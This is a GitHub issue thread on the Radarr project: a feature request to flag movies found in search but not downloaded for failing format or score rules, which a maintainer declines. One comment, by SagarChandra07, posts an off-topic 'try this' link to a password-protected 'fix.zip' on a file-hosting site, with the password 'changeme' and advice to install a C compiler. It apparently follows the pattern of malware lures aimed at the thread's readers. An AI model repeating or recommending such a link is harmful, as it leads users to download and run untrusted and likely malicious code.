### ISSUE TITLE
Add Visual Indicator for Movies Found but Not Downloaded Due to Format Mismatch

### ISSUE THREAD

**Issue by Anqui3tas** [Radarr/Radarr#10498]
### Is there an existing issue for this?

- [X] I have searched the existing open and closed issues

### Is your feature request related to a problem? Please describe

Not part of a current problem. 

### Describe the solution you'd like

I’d like to request a feature that adds a visual mark (e.g., a color bar or icon) (or filter) for movies that were found during a search but not downloaded because they didn’t meet the format or score rules I set. This indicator would help me identify that a version of the movie is available, so I can manually download it and reencode if necessary.

### Describe alternatives you've considered

Manual Search and Monitoring:
Manually re-searching for the movie periodically to check if it’s available in formats that don’t meet my original criteria. However, this is time-consuming and inefficient.

### Anything else?

Since Radarr will have found these other sources during normal search/scans, a simple way of notifying the user that sources were found, but not downloaded. 

This is more common with older movies, that may become available in a lower quality or larger size than normal downloads, but are not common enough to wait for another version, or may not last long enough on certain download types.

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by bakerboy448** [comment]
No plans at this time

> I’d like to request a feature that adds a visual mark (e.g., a color bar or icon) (or filter) for movies that were found during a search but not downloaded because they didn’t meet the format or score rules I set. 

this is obvious as one should be searching on add when adding a movie; thus it'd be missing/wanted after.

> Manually re-searching for the movie periodically to check if it’s available in formats that don’t meet my original criteria.

theoretically unecessary as RSS would cover this

> a simple way of notifying the user that sources were found, but not downloaded.

no plans.
